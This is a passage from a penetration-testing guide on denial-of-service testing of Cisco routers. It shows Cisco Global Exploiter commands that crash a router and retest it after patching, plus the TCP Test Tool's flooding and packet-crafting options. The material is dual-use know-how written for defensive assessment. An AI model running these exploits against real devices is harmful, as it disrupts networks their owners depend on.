Several tools capable of launching Cisco-centric DoS attacks are freely available for download on the Internet. A vigilant system administrator or a penetration tester can employ them to test her own or the client's network to evaluate its resilience to DoS attacks that can be potentially launched by crackers. In this section, we review two such tools that are useful for launching a variety of DoS attacks against Cisco boxes.
Cisco Global Exploiter (CGE) is a powerful Perl script that can be used to attack and thus assess the patch level of Cisco devices. At the time of writing, it includes built-in information about 14 vulnerabilities. The best part about this tool is that it allows easy addition of new security flaws. With a trivial knowledge of Perl, you can update and customize the vulnerability database of the tool to represent the best testing scenario for the network. This framework can be downloaded from http://www.packetstormsecurity.org/ by searching for cge . The default CGE can exploit the following bugs in Cisco devices:
arhontus $ perl cge.pl Usage : perl cge.pl <target> <vulnerability number> Vulnerabilities list :  - Cisco 677/678 Telnet Buffer Overflow Vulnerability  - Cisco IOS Router Denial of Service Vulnerability  - Cisco IOS HTTP Auth Vulnerability  - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability  - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability  - Cisco 675 Web Administration Denial of Service Vulnerability  - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability  - Cisco IOS Software HTTP Request Denial of Service Vulnerability  - Cisco 514 UDP Flood Denial of Service Vulnerability  - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability  - Cisco Catalyst Memory Leak Vulnerability  - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability  - 0 Encoding IDS Bypass Vulnerability (UTF)  - Cisco IOS HTTP Denial of Service Vulnerability
With the successful exploitation of a Cisco device, you should see output similar to this:
arhontus $ perl cge.pl 2611b 2 Packet sent ... Now checking server's status ... Vulnerability successful exploited. Target server is down ...
2611b is the name or IP address of the target, and 2 is the vulnerability number; in this particular example it refers to Cisco IOS Router DoS Vulnerability, in which an invalid HTTP request is sent to the router's web management interface.
After upgrading to the latest IOS version, we run the same exploit to check whether the router has been successfully patched for this bug. As you can see, the vulnerability no longer crashes the server:
arhontus $ perl cge.pl 2611b 2 Packet sent ... Now checking server's status ... Vulnerability unsuccessful exploited. Target server is still up ...
The TCP Test Tool was written by the Cisco development team (Critical Infrastructure Assurance Group, or CIAG) to perform security assessments on Cisco devices. It allows the user to craft and send customized TCP packets with any payload. This tool has inherited many of the ideas of the Nemesis packet-construction project. As you can see, a vast amount of options is available to the user to create a firm testing environment. The TCP Test Tool (ttt) can be obtained from the Cisco Systems web site or from http://www.packetstormsecurity.org.
arhontus $ ./ttt --help TCP Test Tool (ttt) Version 1.3 Eloy Paris <firstname.lastname@example.org> From ideas by Sean Convery <email@example.com> and the NEMESIS Project Usage: ttt [-h] [options] General options: -h, --help display this help and exit -c, --count NUM number of segments to send (default is 1) -d, --delay NUM delay in milliseconds (default is 0) --flood NUM flood the network by sending NUM packets TCP options: -x, --sport NUM TCP source port -y, --dport NUM TCP destination port -f, --tcpflags TCP flags -fS SYN, -fA ACK, -fR RST, -fP PSH, -fF FIN, -fU URG (can also use --syn, --ack, --rst, --psh, --fin, and --urg) -w, --window NUM window size -s, --sequence NUM sequence number (^ to increment by window) -a, --acknowledgement NUM acknowledgement number -u, --urgent NUM urgent pointer -P, --payload FILE payload file (use stdin if FILE is '-') -5, --md5 SECRET use TCP MD5 signatures (TCP option 19) --mss NUM TCP maximum segment size --wscale NUM window scale option --nocksum don't compute TCP checksums IP options: -S, --src ADDRESS source IP address -D, --dst ADDRESS destination IP address -I, --id NUM IP ID -T, --ttl NUM IP time to live -t, --tos NUM IP type of service
This utility can also be used from a scripting platform to generate random payload or specific options, such as BGP bruteforcing, as has been done with tcpsig-crack.pl in the examples directory. An attacker or penetration tester can generate a large amount of testing scenarios with this suite, which are limited only by the user's imagination .